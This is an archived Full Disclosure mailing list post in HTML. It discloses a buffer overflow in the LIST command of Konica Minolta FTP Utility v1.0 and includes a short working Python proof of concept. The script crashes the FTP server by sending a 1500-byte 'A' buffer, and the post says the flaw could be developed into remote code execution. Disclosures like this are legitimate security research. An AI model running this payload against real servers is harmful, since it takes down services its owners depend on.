[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC)

To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
Subject: [FD] Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC)
From: <socket_0x03@xxxxxxxxxxx>
Date: Wed, 20 May 2020 05:22:26 -0700

<html><body><span style="font-family:Verdana; color:#000000; 
font-size:10pt;"><div style=""><font face="verdana, geneva" style=""><span 
style=""><br style=""></span></font></div><div style=""><font face="verdana, 
geneva" style=""><span style=""><br style=""></span></font></div><div 
style=""><font face="verdana, geneva" style=""><span 
style="">====================================================================================================</span></font></div><div
 style=""><font face="verdana, geneva" style=""><span style="">=============== 
[ Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) ] 
===============</span></font></div><div style=""><font face="verdana, geneva" 
style=""><span 
style="">====================================================================================================</span></font></div><div
 style=""><font face="verdana, geneva" style=""><span style=""><br 
style=""></span></font></div><div style=""><font face="verdana, geneva" 
style=""><span style=""># Exploit Title: Konica Minolta FTP Utility v1.0 - 
'LIST' Denial of Service (PoC)&nbsp;</span></font></div><div style=""><font 
face="verdana, geneva" style=""><span style=""># Date: 
[05-16-2020]</span></font></div><div style=""><font face="verdana, geneva" 
style=""><span style="">#</span></font></div><div style=""><font face="verdana, 
geneva" style=""><span style=""># Found by: Alvaro J. Gene 
(Socket_0x03)</span></font></div><div style=""><font face="verdana, geneva" 
style=""><span style=""># Email: Socket_0x03 (at) teraexe (dot) 
com</span></font></div><div style=""><font face="verdana, geneva" 
style=""><span style=""># Website: www (dot) teraexe (dot) 
com</span></font></div><div style=""><font face="verdana, geneva" 
style=""><span style="">#&nbsp;</span></font></div><div style=""><font 
face="verdana, geneva" style=""><span style=""># Software Link: <a 
href="https://konica-minolta-ftp-utility.software.informer.com/download";>https://konica-minolta-ftp-utility.software.informer.com/download</a>/</span></font></div><div
 style=""><font face="verdana, geneva" style=""><span style=""># Vulnerable 
Application: Konica Minolta FTP Utility</span></font></div><div style=""><font 
face="verdana, geneva" style=""><span style=""># Version: 
1.0</span></font></div><div style=""><font face="verdana, geneva" 
style=""><span style=""># Server: FTP Server</span></font></div><div 
style=""><font face="verdana, geneva" style=""><span style=""># Vulnerable 
Command: LIST</span></font></div><div style=""><font face="verdana, geneva" 
style=""><span style=""># Tested on: Windows 7 SP1</span></font></div><div 
style=""><font face="verdana, geneva" style=""><span 
style="">#&nbsp;</span></font></div><div style=""><font face="verdana, geneva" 
style=""><span style=""># Impact: There is a buffer overflow vulnerability in 
the LIST command of the FTP server</span></font></div><div style=""><font 
face="verdana, geneva" style=""><span style=""># "Konica Minolta FTP Utility" 
that will allow an attacker to overwrite some 
registers,&nbsp;</span></font></div><div style=""><font face="verdana, geneva" 
style=""><span style=""># such as EAX, ESI, EDI... Even though the next codes 
will crash the FTP server and overwrite&nbsp;</span></font></div><div 
style=""><font face="verdana, geneva" style=""><span style=""># some registers, 
an individual can use the vulnerable command to build a remote 
buffer&nbsp;</span></font></div><div style=""><font face="verdana, geneva" 
style=""><span style=""># overflow exploit that will root a system without any 
user interaction.&nbsp;</span></font></div><div style=""><font face="verdana, 
geneva" style=""><span style=""><br style=""></span></font></div><div 
style=""><font face="verdana, geneva" style=""><span style=""><br 
style=""></span></font></div><div style=""><font face="verdana, geneva" 
style=""><span style="">from ftplib import FTP</span></font></div><div 
style=""><font face="verdana, geneva" style=""><span style=""><br 
style=""></span></font></div><div style=""><font face="verdana, geneva" 
style=""><span style="">ftp = FTP('192.168.0.16')</span></font></div><div 
style=""><font face="verdana, geneva" style=""><span style=""><br 
style=""></span></font></div><div style=""><font face="verdana, geneva" 
style=""><span style="">buffer = "A" * 1500</span></font></div><div 
style=""><font face="verdana, geneva" style=""><span style=""><br 
style=""></span></font></div><div style=""><font face="verdana, geneva" 
style=""><span style="">ftp.login()</span></font></div><div style=""><font 
face="verdana, geneva" style=""><span style=""><br 
style=""></span></font></div><div style=""><font face="verdana, geneva" 
style=""><span style="">ftp.retrlines('LIST ' + 
buffer)</span></font></div></span></body></html>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] Filetto v1.0 - 'FEAT' Denial of Service (PoC)
Next by Date: [FD] Konica Minolta FTP Utility v1.0 - 'NLST' Denial of Service (PoC)
Previous by thread: [FD] Filetto v1.0 - 'FEAT' Denial of Service (PoC)
Next by thread: [FD] Konica Minolta FTP Utility v1.0 - 'NLST' Denial of Service (PoC)
Index(es):
- Date
- Thread